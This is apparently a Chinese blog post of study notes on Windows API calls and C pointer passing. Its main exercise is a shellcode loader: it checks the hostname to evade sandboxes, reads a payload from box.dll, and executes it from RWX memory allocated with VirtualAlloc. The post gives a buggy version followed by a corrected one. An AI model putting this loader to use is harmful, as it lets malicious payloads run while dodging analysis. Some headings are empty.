Windows API 和指针传递

大头……

已于 2024-07-14 16:35:25 修改

阅读量112

点赞数 2

文章标签： windows c++

于 2024-07-14 16:30:13 首次发布

本文链接：https://blog.csdn.net/m0_65852484/article/details/140418520

版权

1.Windows API

1.1 MessageBox

#include<stdio.h>
#include<Windows.h>
DWORD WINAPI ThreadProc(LPVOID IpParameter) {
	MessageBox(0, 0, 0, 0);
	return 0;
};
int main() {
	HANDLE thread = CreateThread(0, 0, ThreadProc, 0, 0, 0);
	WaitForSingleObject(thread, -1);
	return 0;
}

1.2 CreateThread

1.3 CreateProcess

#include<stdio.h>
#include<Windows.h>
};
int main() {

	STARTUPINFO si;
	PROCESS_INFORMATION pi;

	ZeroMemory(&(si), sizeof(si));
	si.cb = sizeof(si);
	ZeroMemory(&(pi), sizeof(pi));

	//创建进程
	if (!CreateProcessA("C:\\Program Files(x86)\\Microsoft\\Edge\\Application\\msedge.exe", "msedge www.baidu.com", NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi))
	{
		fprintf(stderr, "CreateProcess failed\n");
	    return -1; }
		
}

1.4 VirtualAlloc

2.指针

2.1 形参与实参的传递

2.2 双重指针

2.3 读取文件到缓冲区

原始错误代码：

#include<windows.h>
#include<string.h>
#include<stdio.h>
#include<stdlib.h>

#pragma warning(disable:4996)
/*
	要求1 单步调试 并处理所有的错误语法 最终程序运行结果是弹窗一个弹窗 
	要求2 对GetHostName函数进行改造 hostName改为二级指针的方式传递
	要求3 对GetHostName函数进行改造 hostName作为返回值 传入方式为1级指针
*/

BOOL GetHostName(CHAR* hostName)
{
	DWORD hostNameLen = sizeof(hostName);
	if (!GetComputerNameA(hostName, &hostNameLen)) // GetComputerNameA是win32 的api 获取电脑hostname 第一个参数为存放hostname的内存缓冲区 第二个参数为缓冲区大小的地址
	{
		return FALSE;
	}
	return TRUE;
}

BOOL CheckIsSandbox()
{
	CHAR hostName[MAX_PATH] = { 0 };
	CHAR* sandboxName		= "sandbox";

	if(!GetHostName(hostName))
		return FALSE;
	if (!strstr(hostName, sandboxName)) /rstr 字符串比较函数 bool类型
	{
		printf("%s\n", "not in sandbox");
		return TRUE;
	}
	return FALSE;
}

BOOL ReadPayload(char* shellcodeBuffer, PDWORD shellcodeSize) 
{
    FILE* file       = { 0 };
    WCHAR* buffer     = NULL;
    SIZE_T file_size = { 0 };

    file = fopen(L"box.dll", "rb");    // 打开文件
    if (file == NULL) {
        perror("Error opening file");
        return FALSE;
    }

    fseek(file, 0, SEEK_END);  // 获取文件大小
    file_size = ftell(file);
    rewind(file);

    buffer = (char*)calloc(file_size, 1);
    if (buffer == NULL) {
        perror("Memory allocation error");
        fclose(file);
        return FALSE;
    }

    fread(buffer, sizeof(char), file_size, file);    // 将读取文件内容到内存拷贝到我们申请的内存中
	*shellcodeBuffer = &buffer;
	*shellcodeSize = &file_size;

    fclose(file);// 关闭文件
	return TRUE;
}

BOOL ExecShellcode(char* shellcode, DWORD shellcodeSize)
{
	PVOID* shellcodeBuffer = NULL;
	if (shellcodeSize == 0)
	{
		printf("Invalid shellCode length\n");
		return FALSE;
	}
	
	shellcodeBuffer = calloc(shellcodeSize, 1);
	memcpy(shellcodeBuffer, shellcode, shellcodeSize);
	((void(*)())shellcodeBuffer)();
	return TRUE;
}

int main()
{
	if (!CheckIsSandbox())
	{
		return 1;
	}
	else
	{
		CHAR* shellcodeBuffer = NULL;
		DWORD shellcodeSize = 0;
		if(!ReadPayload(shellcodeBuffer, &shellcodeSize))
			return 1;
		ExecShellcode(shellcodeBuffer, shellcodeSize);
	}
	return 0;
}

根据本次学习修稿后：

#include<windows.h>
#include<string.h>
#include<stdio.h>
#include<stdlib.h>

#pragma warning(disable:4996)
/*
	要求1 单步调试 并处理所有的错误语法 最终程序运行结果是弹窗一个弹窗 
	要求2 对GetHostName函数进行改造 hostName改为二级指针的方式传递
	要求3 对GetHostName函数进行改造 hostName作为返回值 传入方式为1级指针
*/

BOOL GetHostName(CHAR* hostName)
{
	DWORD hostNameLen = sizeof(hostName);
	if (!GetComputerNameA(hostName, &hostNameLen)) // GetComputerNameA是win32 的api 获取电脑hostname 第一个参数为存放hostname的内存缓冲区 第二个参数为缓冲区大小的地址
	{
		return FALSE;
	}
	return TRUE;
}

BOOL CheckIsSandbox()
{
	CHAR hostName[MAX_PATH] = { 0 };
	CHAR* sandboxName		= "sandbox";

	if(!GetHostName(hostName))
		return FALSE;

	if (!strstr(hostName, sandboxName)) //strstr 字符串比较函数 bool类型
	{
		printf("%s\n", "not in sandbox");
		return TRUE;
	}
	return FALSE;
}

BOOL ReadPayload(char** shellcodeBuffer, DWORD* shellcodeSize) 
{
    FILE* file       = { 0 };
    CHAR* buffer     = NULL;
    SIZE_T file_size = { 0 };

    file = fopen("box.dll", "rb");    // 打开文件
    if (file == NULL) {
        perror("Error opening file");
        return FALSE;
    }

    fseek(file, 0, SEEK_END);  // 获取文件大小
    file_size = ftell(file);
    rewind(file);

    buffer = (char*)calloc(file_size, 1);
    if (buffer == NULL) {
        perror("Memory allocation error");
        fclose(file);
        return FALSE;
    }

    fread(buffer, sizeof(char), file_size, file);    // 将读取文件内容到内存拷贝到我们申请的内存中
	*shellcodeBuffer = buffer;
	*shellcodeSize = (DWORD)file_size;

    fclose(file);// 关闭文件
	return TRUE;
}

BOOL ExecShellcode(char* shellcode, DWORD shellcodeSize)
{
	PVOID* shellcodeBuffer = NULL;
	if (shellcodeSize == 0)
	{
		printf("Invalid shellCode length\n");
		return FALSE;
	}
	
	shellcodeBuffer = VirtualAlloc(NULL,shellcodeSize,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);
	memcpy(shellcodeBuffer, shellcode, shellcodeSize);
	((void(*)())shellcodeBuffer)();
	return TRUE;
}

int main()
{

	{
		CHAR* shellcodeBuffer = NULL;
		DWORD shellcodeSize = 0;
		if(!ReadPayload(&shellcodeBuffer, &shellcodeSize))
			return 1;
		ExecShellcode(shellcodeBuffer, shellcodeSize);
	}
	return 0;
}